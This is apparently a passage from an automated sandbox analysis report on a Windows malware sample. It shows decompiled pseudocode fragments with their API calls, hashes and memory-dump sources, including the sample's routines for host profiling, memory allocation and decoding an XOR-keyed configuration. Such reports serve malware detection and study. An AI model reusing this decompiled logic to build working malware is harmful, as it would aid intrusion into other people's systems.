                                                                                                            • SysAllocString.OLEAUT32(0303258B), ref: 030358C7
                                                                                                              • Part of subcall function 0303144D: SysFreeString.OLEAUT32(?), ref: 0303152C
                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 03035908
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.751417390.0000000003031000.00000020.00020000.sdmp, Offset: 03030000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.751377465.0000000003030000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751473328.000000000303C000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751508317.000000000303D000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751528470.000000000303F000.00000002.00020000.sdmp
                                                                                                            Similarity
                                                                                                            • API ID: String$Free$Alloc
                                                                                                            • String ID:
                                                                                                            • API String ID: 986138563-0
                                                                                                            • Opcode ID: 3e3b198c3ec4a14b28c38a78202ee1dc81d6659612bd559db67c4a0cb95cc572
                                                                                                            • Instruction ID: f340798d60b08f089f2994e2ef102edfa37639ce83713f71a7735d457f2e0822
                                                                                                            • Opcode Fuzzy Hash: 3e3b198c3ec4a14b28c38a78202ee1dc81d6659612bd559db67c4a0cb95cc572
                                                                                                            • Instruction Fuzzy Hash: 43016D3651215ABFDB41EFA9DC08DEF7BBCEF49610B014122F905E7120D7309A25CBA2
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 37%
                                                                                                            			E03031BBF(void* __ecx) {
                                                                                                            				signed int _v8;
                                                                                                            				void* _t15;
                                                                                                            				void* _t19;
                                                                                                            				void* _t20;
                                                                                                            				void* _t22;
                                                                                                            				intOrPtr* _t23;
                                                                                                            
                                                                                                            				_t23 = __imp__;
                                                                                                            				_t20 = 0;
                                                                                                            				_v8 = _v8 & 0;
                                                                                                            				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
                                                                                                            				_t10 = _v8;
                                                                                                            				if(_v8 != 0) {
                                                                                                            					_t20 = E030375F6(_t10 + 1);
                                                                                                            					if(_t20 != 0) {
                                                                                                            						_t15 =  *_t23(3, _t20,  &_v8); // executed
                                                                                                            						if(_t15 != 0) {
                                                                                                            							 *((char*)(_v8 + _t20)) = 0;
                                                                                                            						} else {
                                                                                                            							E03034AAB(_t20);
                                                                                                            							_t20 = 0;
                                                                                                            						}
                                                                                                            					}
                                                                                                            				}
                                                                                                            				return _t20;
                                                                                                            			}









                                                                                                            APIs
                                                                                                            • GetComputerNameExA.KERNEL32(00000003,00000000,03034531,747DF710,00000000,?,?,03034531), ref: 03031BD7
                                                                                                              • Part of subcall function 030375F6: RtlAllocateHeap.NTDLL(00000000,00000000,03034F70), ref: 03037602
                                                                                                            • GetComputerNameExA.KERNEL32(00000003,00000000,03034531,03034532,?,?,03034531), ref: 03031BF4
                                                                                                              • Part of subcall function 03034AAB: RtlFreeHeap.NTDLL(00000000,00000000,03035012,00000000,?,?,00000000), ref: 03034AB7
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.751417390.0000000003031000.00000020.00020000.sdmp, Offset: 03030000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.751377465.0000000003030000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751473328.000000000303C000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751508317.000000000303D000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751528470.000000000303F000.00000002.00020000.sdmp
                                                                                                            Similarity
                                                                                                            • API ID: ComputerHeapName$AllocateFree
                                                                                                            • String ID:
                                                                                                            • API String ID: 187446995-0
                                                                                                            • Opcode ID: c0cbbf41dc80a6148ebc7b4b56b632a7df5cfa83fa25cd30085709b4bc517e8d
                                                                                                            • Instruction ID: 1b692a78eb2963651773794898ba5bae49bb6c4c062c5f9fd73e014ca2a402a8
                                                                                                            • Opcode Fuzzy Hash: c0cbbf41dc80a6148ebc7b4b56b632a7df5cfa83fa25cd30085709b4bc517e8d
                                                                                                            • Instruction Fuzzy Hash: 82F0B43A611205FAEB10E69A8D01FEF77FCDBCA615F140055E900D7140EA70DA018670
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			_entry_(intOrPtr _a4, intOrPtr _a8) {
                                                                                                            				intOrPtr _t4;
                                                                                                            				void* _t10;
                                                                                                            				void* _t11;
                                                                                                            				void* _t12;
                                                                                                            				void* _t14;
                                                                                                            
                                                                                                            				_t14 = 1;
                                                                                                            				_t4 = _a8;
                                                                                                            				if(_t4 == 0) {
                                                                                                            					if(InterlockedDecrement(0x303d274) == 0) {
                                                                                                            						E03034450();
                                                                                                            					}
                                                                                                            				} else {
                                                                                                            					if(_t4 == 1 && InterlockedIncrement(0x303d274) == 1) {
                                                                                                            						_t10 = E0303262F(_t11, _t12, _a4); // executed
                                                                                                            						if(_t10 != 0) {
                                                                                                            							_t14 = 0;
                                                                                                            						}
                                                                                                            					}
                                                                                                            				}
                                                                                                            				return _t14;
                                                                                                            			}








                                                                                                            APIs
                                                                                                            • InterlockedIncrement.KERNEL32(0303D274), ref: 030318ED
                                                                                                              • Part of subcall function 0303262F: HeapCreate.KERNEL32(00000000,00400000,00000000,?,00000001,?,?,?,03031900,?), ref: 03032642
                                                                                                            • InterlockedDecrement.KERNEL32(0303D274), ref: 0303190D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.751417390.0000000003031000.00000020.00020000.sdmp, Offset: 03030000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.751377465.0000000003030000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751473328.000000000303C000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751508317.000000000303D000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751528470.000000000303F000.00000002.00020000.sdmp
                                                                                                            Similarity
                                                                                                            • API ID: Interlocked$CreateDecrementHeapIncrement
                                                                                                            • String ID:
                                                                                                            • API String ID: 3834848776-0
                                                                                                            • Opcode ID: 657f0a87d895f36fe3b64542c9d856cbd6e5d6f2a7668b79a68951e6c1340219
                                                                                                            • Instruction ID: dd8e202457b3bda60c2a7c444c16e0c4829d3ef052fa5d7f2a33cecaad433a98
                                                                                                            • Opcode Fuzzy Hash: 657f0a87d895f36fe3b64542c9d856cbd6e5d6f2a7668b79a68951e6c1340219
                                                                                                            • Instruction Fuzzy Hash: 13E0DF39347223BBCB79FA70880579FEA8CAB1B680F084932A482D502AC210C4818291
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 34%
                                                                                                            			E03031E47(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                                                                                                            				intOrPtr _v12;
                                                                                                            				void* _v18;
                                                                                                            				char _v20;
                                                                                                            				intOrPtr _t15;
                                                                                                            				void* _t17;
                                                                                                            				intOrPtr _t19;
                                                                                                            				void* _t23;
                                                                                                            
                                                                                                            				_v20 = 0;
                                                                                                            				asm("stosd");
                                                                                                            				asm("stosd");
                                                                                                            				asm("stosd");
                                                                                                            				asm("stosw");
                                                                                                            				_t15 =  *0x303d2e0; // 0x22da5a8
                                                                                                            				_t4 = _t15 + 0x303e39c; // 0x5318944
                                                                                                            				_t20 = _t4;
                                                                                                            				_t6 = _t15 + 0x303e124; // 0x650047
                                                                                                            				_t17 = E0303144D(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
                                                                                                            				if(_t17 < 0) {
                                                                                                            					_t23 = _t17;
                                                                                                            				} else {
                                                                                                            					_t23 = 8;
                                                                                                            					if(_v20 != _t23) {
                                                                                                            						_t23 = 1;
                                                                                                            					} else {
                                                                                                            						_t19 = E030325D6(_t20, _v12);
                                                                                                            						if(_t19 != 0) {
                                                                                                            							 *_a16 = _t19;
                                                                                                            							_t23 = 0;
                                                                                                            						}
                                                                                                            						__imp__#6(_v12);
                                                                                                            					}
                                                                                                            				}
                                                                                                            				return _t23;
                                                                                                            			}











                                                                                                            APIs
                                                                                                              • Part of subcall function 0303144D: SysFreeString.OLEAUT32(?), ref: 0303152C
                                                                                                              • Part of subcall function 030325D6: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,0303474F,004F0053,00000000,?), ref: 030325DF
                                                                                                              • Part of subcall function 030325D6: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,0303474F,004F0053,00000000,?), ref: 03032609
                                                                                                              • Part of subcall function 030325D6: memset.NTDLL ref: 0303261D
                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 03031EAA
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.751417390.0000000003031000.00000020.00020000.sdmp, Offset: 03030000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.751377465.0000000003030000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751473328.000000000303C000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751508317.000000000303D000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751528470.000000000303F000.00000002.00020000.sdmp
                                                                                                            Similarity
                                                                                                            • API ID: FreeString$lstrlenmemcpymemset
                                                                                                            • String ID:
                                                                                                            • API String ID: 397948122-0
                                                                                                            • Opcode ID: 846b9cad890a182945518300ae5f95af50f108929cb475a098822eba84bb3199
                                                                                                            • Instruction ID: 1cbc00deb39b69de7f02b673ae41ac053be4ec5cc7108ccab8efb53b35764ce8
                                                                                                            • Opcode Fuzzy Hash: 846b9cad890a182945518300ae5f95af50f108929cb475a098822eba84bb3199
                                                                                                            • Instruction Fuzzy Hash: 4E015E32906119BBDB55EBA8DC04AEEBBBDFF4A250F008625E901E7160D771A911C791
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • RtlAllocateHeap.NTDLL(00000008,6F0DA0D4,00000000), ref: 6F0914AF
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.753041600.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: AllocateHeap
                                                                                                            • String ID:
                                                                                                            • API String ID: 1279760036-0
                                                                                                            • Opcode ID: 3bdbbbb922a4d72496aa8c277c75cfbc11930e54c4ef02e0cfe0f89890733d3e
                                                                                                            • Instruction ID: 102dfec6744d56ac5575113623db97253016d7f2ccc805435d2adfd98f5a0dc4
                                                                                                            • Opcode Fuzzy Hash: 3bdbbbb922a4d72496aa8c277c75cfbc11930e54c4ef02e0cfe0f89890733d3e
                                                                                                            • Instruction Fuzzy Hash: B1F0E931789A2456EB119A768804F9F37DDAF4A770B119262EC28DB1C0EB34E801A6E1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • RtlEncodePointer.NTDLL(?), ref: 6F055C69
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.753041600.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: EncodePointer
                                                                                                            • String ID:
                                                                                                            • API String ID: 2118026453-0
                                                                                                            • Opcode ID: 2ebb6d7158f1e18b6a3771e2059e40d700e2a90f63e9c6a96261b371881faa7b
                                                                                                            • Instruction ID: 18d34cb1b9aa7f214233c6aead2b22566878d65c0e47463362096e6cac607536
                                                                                                            • Opcode Fuzzy Hash: 2ebb6d7158f1e18b6a3771e2059e40d700e2a90f63e9c6a96261b371881faa7b
                                                                                                            • Instruction Fuzzy Hash: 26D092B0008E199BDF049F44EC047643FB4F706376F604229E81D83296D7315470EA44
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E0303AB16() {
                                                                                                            
                                                                                                            				E0303ABF6(0x303c344, 0x303d124); // executed
                                                                                                            				goto __eax;
                                                                                                            			}



                                                                                                            0x0303ab28
                                                                                                            0x0303ab2f

                                                                                                            APIs
                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0303AB28
                                                                                                              • Part of subcall function 0303ABF6: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0303AC6F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.751417390.0000000003031000.00000020.00020000.sdmp, Offset: 03030000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.751377465.0000000003030000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751473328.000000000303C000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751508317.000000000303D000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751528470.000000000303F000.00000002.00020000.sdmp
                                                                                                            Similarity
                                                                                                            • API ID: ExceptionHelper2@8LoadRaise___delay
                                                                                                            • String ID:
                                                                                                            • API String ID: 123106877-0
                                                                                                            • Opcode ID: d31956259cd5d77e6f78f36ca1038c62dbaa6c01e435e192a9fd0ed82ad5cebe
                                                                                                            • Instruction ID: 7dd5650d74ff3b19f9431b5d1e02c6c8932dfc8a1f24d804d39c61339234bd71
                                                                                                            • Opcode Fuzzy Hash: d31956259cd5d77e6f78f36ca1038c62dbaa6c01e435e192a9fd0ed82ad5cebe
                                                                                                            • Instruction Fuzzy Hash: D1B012A537B101BDF00CD11D5D12D3F028DC0C3A103208C1BF840DC002D9615C410036
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E0303AB31() {
                                                                                                            
                                                                                                            				E0303ABF6(0x303c344, 0x303d134); // executed
                                                                                                            				goto __eax;
                                                                                                            			}



                                                                                                            0x0303ab28
                                                                                                            0x0303ab2f

                                                                                                            APIs
                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0303AB28
                                                                                                              • Part of subcall function 0303ABF6: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0303AC6F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.751417390.0000000003031000.00000020.00020000.sdmp, Offset: 03030000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.751377465.0000000003030000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751473328.000000000303C000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751508317.000000000303D000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751528470.000000000303F000.00000002.00020000.sdmp
                                                                                                            Similarity
                                                                                                            • API ID: ExceptionHelper2@8LoadRaise___delay
                                                                                                            • String ID:
                                                                                                            • API String ID: 123106877-0
                                                                                                            • Opcode ID: 215f3688efb5d7014fc981083b917808d37584f23047cfd3b1977b8bb42f87ab
                                                                                                            • Instruction ID: 324283f10b88b4470c1067e254b4893c8c23718e65b2bc91047d5b636e13ccb6
                                                                                                            • Opcode Fuzzy Hash: 215f3688efb5d7014fc981083b917808d37584f23047cfd3b1977b8bb42f87ab
                                                                                                            • Instruction Fuzzy Hash: ADB0128937B101BDF108D11D5D12D3F024EC0C3910320881BF840CC102D8604C410132
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E030375F6(long _a4) {
                                                                                                            				void* _t2;
                                                                                                            
                                                                                                            				_t2 = RtlAllocateHeap( *0x303d270, 0, _a4); // executed
                                                                                                            				return _t2;
                                                                                                            			}




                                                                                                            0x03037602
                                                                                                            0x03037608

                                                                                                            APIs
                                                                                                            • RtlAllocateHeap.NTDLL(00000000,00000000,03034F70), ref: 03037602
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.751417390.0000000003031000.00000020.00020000.sdmp, Offset: 03030000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.751377465.0000000003030000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751473328.000000000303C000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751508317.000000000303D000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751528470.000000000303F000.00000002.00020000.sdmp
                                                                                                            Similarity
                                                                                                            • API ID: AllocateHeap
                                                                                                            • String ID:
                                                                                                            • API String ID: 1279760036-0
                                                                                                            • Opcode ID: eadb5a5807a269c08dbebfbb49071fafeaf40b1598d82beab409953a5396e087
                                                                                                            • Instruction ID: 59337dd94edeafbe31f03b836697ef803702e150cf28f5ce7229d9b290ad301f
                                                                                                            • Opcode Fuzzy Hash: eadb5a5807a269c08dbebfbb49071fafeaf40b1598d82beab409953a5396e087
                                                                                                            • Instruction Fuzzy Hash: F4B01272005100ABDE11AB10DE08F057B35B760700F014011B20490068C2358434EB04
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E03035DDA(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, WCHAR* _a20) {
                                                                                                            				void* _t17;
                                                                                                            
                                                                                                            				if(_a4 == 0) {
                                                                                                            					L2:
                                                                                                            					return E03031138(_a8, 1, _a12, _a16, _a20, lstrlenW(_a20) + _t14 + 2);
                                                                                                            				}
                                                                                                            				_t17 = E030358AE(_a4, _a8, _a12, _a16, _a20); // executed
                                                                                                            				if(_t17 != 0) {
                                                                                                            					goto L2;
                                                                                                            				}
                                                                                                            				return _t17;
                                                                                                            			}





                                                                                                            APIs
                                                                                                            • lstrlenW.KERNEL32(?,?,?,030329F4,3D0303C0,80000002,03032197,0303258B,74666F53,4D4C4B48,0303258B,?,3D0303C0,80000002,03032197,?), ref: 03035DFF
                                                                                                              • Part of subcall function 030358AE: SysAllocString.OLEAUT32(0303258B), ref: 030358C7
                                                                                                              • Part of subcall function 030358AE: SysFreeString.OLEAUT32(00000000), ref: 03035908
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.751417390.0000000003031000.00000020.00020000.sdmp, Offset: 03030000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.751377465.0000000003030000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751473328.000000000303C000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751508317.000000000303D000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751528470.000000000303F000.00000002.00020000.sdmp
                                                                                                            Similarity
                                                                                                            • API ID: String$AllocFreelstrlen
                                                                                                            • String ID:
                                                                                                            • API String ID: 3808004451-0
                                                                                                            • Opcode ID: f6374a5f71e64dc9acd07d3150556e1af761588ca0605441f44d2e5f86387bd3
                                                                                                            • Instruction ID: df6962e36c2859c8548272074a1bc80fb949e2cdb7e142ae3b5e01a4d948a705
                                                                                                            • Opcode Fuzzy Hash: f6374a5f71e64dc9acd07d3150556e1af761588ca0605441f44d2e5f86387bd3
                                                                                                            • Instruction Fuzzy Hash: B2F09B3600120EBFDF16AF90DC05EEA7FAAEF0A750F048415BA1458071DB72C9B1EBA0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Non-executed Functions

                                                                                                            C-Code - Quality: 96%
                                                                                                            			E03034C40(int* __ecx) {
                                                                                                            				int _v8;
                                                                                                            				void* _v12;
                                                                                                            				void* _v16;
                                                                                                            				void* __esi;
                                                                                                            				signed int _t28;
                                                                                                            				signed int _t33;
                                                                                                            				signed int _t39;
                                                                                                            				char* _t45;
                                                                                                            				char* _t46;
                                                                                                            				char* _t47;
                                                                                                            				char* _t48;
                                                                                                            				char* _t49;
                                                                                                            				char* _t50;
                                                                                                            				void* _t51;
                                                                                                            				void* _t52;
                                                                                                            				void* _t53;
                                                                                                            				intOrPtr _t54;
                                                                                                            				void* _t56;
                                                                                                            				intOrPtr _t57;
                                                                                                            				intOrPtr _t58;
                                                                                                            				signed int _t61;
                                                                                                            				intOrPtr _t64;
                                                                                                            				signed int _t65;
                                                                                                            				signed int _t70;
                                                                                                            				void* _t72;
                                                                                                            				void* _t73;
                                                                                                            				signed int _t75;
                                                                                                            				signed int _t78;
                                                                                                            				signed int _t82;
                                                                                                            				signed int _t86;
                                                                                                            				signed int _t90;
                                                                                                            				signed int _t94;
                                                                                                            				signed int _t98;
                                                                                                            				void* _t103;
                                                                                                            				intOrPtr _t121;
                                                                                                            
                                                                                                            				_t104 = __ecx;
                                                                                                            				_t28 =  *0x303d2dc; // 0x69b25f44
                                                                                                            				if(E03035657( &_v8,  &_v12, _t28 ^ 0x889a0120) != 0 && _v12 >= 0x110) {
                                                                                                            					 *0x303d310 = _v8;
                                                                                                            				}
                                                                                                            				_t33 =  *0x303d2dc; // 0x69b25f44
                                                                                                            				if(E03035657( &_v16,  &_v12, _t33 ^ 0x0159e6c7) == 0) {
                                                                                                            					_v12 = 2;
                                                                                                            					L69:
                                                                                                            					return _v12;
                                                                                                            				}
                                                                                                            				_t39 =  *0x303d2dc; // 0x69b25f44
                                                                                                            				if(E03035657( &_v12,  &_v8, _t39 ^ 0xe60382a5) == 0) {
                                                                                                            					L67:
                                                                                                            					HeapFree( *0x303d270, 0, _v16);
                                                                                                            					goto L69;
                                                                                                            				} else {
                                                                                                            					_t103 = _v12;
                                                                                                            					if(_t103 == 0) {
                                                                                                            						_t45 = 0;
                                                                                                            					} else {
                                                                                                            						_t98 =  *0x303d2dc; // 0x69b25f44
                                                                                                            						_t45 = E03033BB8(_t104, _t103, _t98 ^ 0x7895433b);
                                                                                                            					}
                                                                                                            					if(_t45 != 0) {
                                                                                                            						_t104 =  &_v8;
                                                                                                            						if(StrToIntExA(_t45, 0,  &_v8) != 0) {
                                                                                                            							 *0x303d278 = _v8;
                                                                                                            						}
                                                                                                            					}
                                                                                                            					if(_t103 == 0) {
                                                                                                            						_t46 = 0;
                                                                                                            					} else {
                                                                                                            						_t94 =  *0x303d2dc; // 0x69b25f44
                                                                                                            						_t46 = E03033BB8(_t104, _t103, _t94 ^ 0x219b08c7);
                                                                                                            					}
                                                                                                            					if(_t46 != 0) {
                                                                                                            						_t104 =  &_v8;
                                                                                                            						if(StrToIntExA(_t46, 0,  &_v8) != 0) {
                                                                                                            							 *0x303d27c = _v8;
                                                                                                            						}
                                                                                                            					}
                                                                                                            					if(_t103 == 0) {
                                                                                                            						_t47 = 0;
                                                                                                            					} else {
                                                                                                            						_t90 =  *0x303d2dc; // 0x69b25f44
                                                                                                            						_t47 = E03033BB8(_t104, _t103, _t90 ^ 0x31fc0661);
                                                                                                            					}
                                                                                                            					if(_t47 != 0) {
                                                                                                            						_t104 =  &_v8;
                                                                                                            						if(StrToIntExA(_t47, 0,  &_v8) != 0) {
                                                                                                            							 *0x303d280 = _v8;
                                                                                                            						}
                                                                                                            					}
                                                                                                            					if(_t103 == 0) {
                                                                                                            						_t48 = 0;
                                                                                                            					} else {
                                                                                                            						_t86 =  *0x303d2dc; // 0x69b25f44
                                                                                                            						_t48 = E03033BB8(_t104, _t103, _t86 ^ 0x0cd926ce);
                                                                                                            					}
                                                                                                            					if(_t48 != 0) {
                                                                                                            						_t104 =  &_v8;
                                                                                                            						if(StrToIntExA(_t48, 0,  &_v8) != 0) {
                                                                                                            							 *0x303d004 = _v8;
                                                                                                            						}
                                                                                                            					}
                                                                                                            					if(_t103 == 0) {
                                                                                                            						_t49 = 0;
                                                                                                            					} else {
                                                                                                            						_t82 =  *0x303d2dc; // 0x69b25f44
                                                                                                            						_t49 = E03033BB8(_t104, _t103, _t82 ^ 0x3cd8b2cb);
                                                                                                            					}
                                                                                                            					if(_t49 != 0) {
                                                                                                            						_t104 =  &_v8;
                                                                                                            						if(StrToIntExA(_t49, 0,  &_v8) != 0) {
                                                                                                            							 *0x303d02c = _v8;
                                                                                                            						}
                                                                                                            					}
                                                                                                            					if(_t103 == 0) {
                                                                                                            						_t50 = 0;
                                                                                                            					} else {
                                                                                                            						_t78 =  *0x303d2dc; // 0x69b25f44
                                                                                                            						_t50 = E03033BB8(_t104, _t103, _t78 ^ 0x2878b929);
                                                                                                            					}
                                                                                                            					if(_t50 == 0) {
                                                                                                            						L41:
                                                                                                            						 *0x303d284 = 5;
                                                                                                            						goto L42;
                                                                                                            					} else {
                                                                                                            						_t104 =  &_v8;
                                                                                                            						if(StrToIntExA(_t50, 0,  &_v8) == 0 || _v8 == 0) {
                                                                                                            							goto L41;
                                                                                                            						} else {
                                                                                                            							L42:
                                                                                                            							if(_t103 == 0) {
                                                                                                            								_t51 = 0;
                                                                                                            							} else {
                                                                                                            								_t75 =  *0x303d2dc; // 0x69b25f44
                                                                                                            								_t51 = E03033BB8(_t104, _t103, _t75 ^ 0x261a367a);
                                                                                                            							}
                                                                                                            							if(_t51 != 0) {
                                                                                                            								_push(_t51);
                                                                                                            								_t72 = 0x10;
                                                                                                            								_t73 = E030349B8(_t72);
                                                                                                            								if(_t73 != 0) {
                                                                                                            									_push(_t73);
                                                                                                            									E03034B98();
                                                                                                            								}
                                                                                                            							}
                                                                                                            							if(_t103 == 0) {
                                                                                                            								_t52 = 0;
                                                                                                            							} else {
                                                                                                            								_t70 =  *0x303d2dc; // 0x69b25f44
                                                                                                            								_t52 = E03033BB8(_t104, _t103, _t70 ^ 0xb9d404b2);
                                                                                                            							}
                                                                                                            							if(_t52 != 0 && E030349B8(0, _t52) != 0) {
                                                                                                            								_t121 =  *0x303d364; // 0x53195b0
                                                                                                            								E03039311(_t121 + 4, _t68);
                                                                                                            							}
                                                                                                            							if(_t103 == 0) {
                                                                                                            								_t53 = 0;
                                                                                                            							} else {
                                                                                                            								_t65 =  *0x303d2dc; // 0x69b25f44
                                                                                                            								_t53 = E03033BB8(_t104, _t103, _t65 ^ 0x3df17130);
                                                                                                            							}
                                                                                                            							if(_t53 == 0) {
                                                                                                            								L59:
                                                                                                            								_t54 =  *0x303d2e0; // 0x22da5a8
                                                                                                            								_t22 = _t54 + 0x303e252; // 0x616d692f
                                                                                                            								 *0x303d30c = _t22;
                                                                                                            								goto L60;
                                                                                                            							} else {
                                                                                                            								_t64 = E030349B8(0, _t53);
                                                                                                            								 *0x303d30c = _t64;
                                                                                                            								if(_t64 != 0) {
                                                                                                            									L60:
                                                                                                            									if(_t103 == 0) {
                                                                                                            										_t56 = 0;
                                                                                                            									} else {
                                                                                                            										_t61 =  *0x303d2dc; // 0x69b25f44
                                                                                                            										_t56 = E03033BB8(_t104, _t103, _t61 ^ 0xd2079859);
                                                                                                            									}
                                                                                                            									if(_t56 == 0) {
                                                                                                            										_t57 =  *0x303d2e0; // 0x22da5a8
                                                                                                            										_t23 = _t57 + 0x303e79a; // 0x6976612e
                                                                                                            										_t58 = _t23;
                                                                                                            									} else {
                                                                                                            										_t58 = E030349B8(0, _t56);
                                                                                                            									}
                                                                                                            									 *0x303d380 = _t58;
                                                                                                            									HeapFree( *0x303d270, 0, _t103);
                                                                                                            									_v12 = 0;
                                                                                                            									goto L67;
                                                                                                            								}
                                                                                                            								goto L59;
                                                                                                            							}
                                                                                                            						}
                                                                                                            					}
                                                                                                            				}
                                                                                                            			}







































                                                                                                            APIs
                                                                                                            • StrToIntExA.SHLWAPI(00000000,00000000,?,03035390,?,69B25F44,?,03035390,69B25F44,?,03035390,69B25F44,00000005,0303D00C,00000008), ref: 03034CE5
                                                                                                            • StrToIntExA.SHLWAPI(00000000,00000000,?,03035390,?,69B25F44,?,03035390,69B25F44,?,03035390,69B25F44,00000005,0303D00C,00000008), ref: 03034D17
                                                                                                            • StrToIntExA.SHLWAPI(00000000,00000000,?,03035390,?,69B25F44,?,03035390,69B25F44,?,03035390,69B25F44,00000005,0303D00C,00000008), ref: 03034D49
                                                                                                            • StrToIntExA.SHLWAPI(00000000,00000000,?,03035390,?,69B25F44,?,03035390,69B25F44,?,03035390,69B25F44,00000005,0303D00C,00000008), ref: 03034D7B
                                                                                                            • StrToIntExA.SHLWAPI(00000000,00000000,?,03035390,?,69B25F44,?,03035390,69B25F44,?,03035390,69B25F44,00000005,0303D00C,00000008), ref: 03034DAD
                                                                                                            • StrToIntExA.SHLWAPI(00000000,00000000,?,03035390,?,69B25F44,?,03035390,69B25F44,?,03035390,69B25F44,00000005,0303D00C,00000008), ref: 03034DDF
                                                                                                            • HeapFree.KERNEL32(00000000,03035390,03035390,?,69B25F44,?,03035390,69B25F44,?,03035390,69B25F44,00000005,0303D00C,00000008,?,03035390), ref: 03034EDD
                                                                                                            • HeapFree.KERNEL32(00000000,?,03035390,?,69B25F44,?,03035390,69B25F44,?,03035390,69B25F44,00000005,0303D00C,00000008,?,03035390), ref: 03034EF0
                                                                                                              • Part of subcall function 030349B8: lstrlen.KERNEL32(69B25F44,00000000,767FD3B0,03035390,03034EC3,00000000,03035390,?,69B25F44,?,03035390,69B25F44,?,03035390,69B25F44,00000005), ref: 030349C1
                                                                                                              • Part of subcall function 030349B8: memcpy.NTDLL(00000000,?,00000000,00000001,?,03035390), ref: 030349E4
                                                                                                              • Part of subcall function 030349B8: memset.NTDLL ref: 030349F3
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.751417390.0000000003031000.00000020.00020000.sdmp, Offset: 03030000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.751377465.0000000003030000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751473328.000000000303C000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751508317.000000000303D000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751528470.000000000303F000.00000002.00020000.sdmp
                                                                                                            Similarity
                                                                                                            • API ID: FreeHeap$lstrlenmemcpymemset
                                                                                                            • String ID: Uxt
                                                                                                            • API String ID: 3442150357-1536154274
